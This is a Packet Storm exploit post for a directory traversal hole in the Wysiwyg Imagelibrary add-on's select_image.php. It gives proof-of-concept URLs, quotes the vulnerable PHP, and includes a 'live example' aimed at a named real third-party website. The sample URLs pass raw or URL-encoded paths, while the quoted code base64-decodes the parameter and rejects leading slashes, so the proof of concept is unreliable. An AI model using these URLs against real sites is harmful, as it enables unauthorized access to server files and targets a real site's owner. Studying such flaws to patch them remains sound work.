what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wysiwyg Imagelibrary Traversal

Wysiwyg Imagelibrary Traversal
Posted Oct 25, 2012
Authored by Geek

The Wysiwyg Imagelibrary add-on suffers from a directory traversal vulnerability in select_image.php.

tags | exploit, php, file inclusion
SHA-256 | f95d8cfa9bbf990cef1d2f8027dcd10b67902dbbb539bb26ac86b28d980af3a3
Download | Favorite | View

Wysiwyg Imagelibrary Traversal

Change Mirror Download


# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
    {x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code : 

$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";

......

    if($get_dir){
        $dir = base64_decode($get_dir);
        
        if(substr($dir, -1, 1)!='/') {
            $dir = $dir . '/';
        }
        $dirok = true;
        $dirnames = split('/', $dir);
        for($di=0; $di<sizeof($dirnames); $di++) {
            if($di<(sizeof($dirnames)-2)) {
                $dotdotdir = $dotdotdir . $dirnames[$di] . '/';
            }
        }
        if(substr($dir, 0, 1)=='/') {
            $dirok = false;
        }
    
        if($dir == $leadon) {
            $dirok = false;
        }
        
        if($dirok) {
            $leadon = $dir;
        }
    }
    
    $opendir = $leadon;
    if(!$leadon) $opendir = '.';
    if(!file_exists($opendir)) {
        $opendir = '.';
        $leadon = $startdir;
    }
    
    
# Live Example : 

    {X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close